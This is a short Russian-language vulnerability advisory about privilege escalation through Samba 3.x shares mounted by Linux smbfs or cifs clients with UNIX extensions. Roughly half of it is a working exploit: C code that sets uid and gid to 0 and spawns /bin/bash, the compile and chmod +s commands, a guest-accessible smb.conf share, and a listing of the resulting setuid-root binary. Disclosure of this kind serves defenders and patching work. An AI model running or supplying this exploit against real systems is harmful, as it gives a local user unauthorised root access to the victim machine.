Уязвимость обнаружена в работе сервера
Samba 3.x и клиента Linux smbfs 2.6.x или 2.4.25-pre8 с UNIX
extensions в .config или 2.4.x + cifs-UE патчи.
Пользователь может получить повышенные
привилегии создавая setuid программу на
клиенте и запуская ее (при помощи SMB share) на
другой. Для работы нужен сервер (предоставляющий
setuid бинарник) и клиент (жертва, монтирующая
ресурс и запускающая программу; атакующий
должен иметь локальный аккаунт).
Эксплоит:
# cat a.c
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
# make a
cc a.c -o a
# chmod +s a
#cat /etc/samba/smb.conf
[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share
# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a
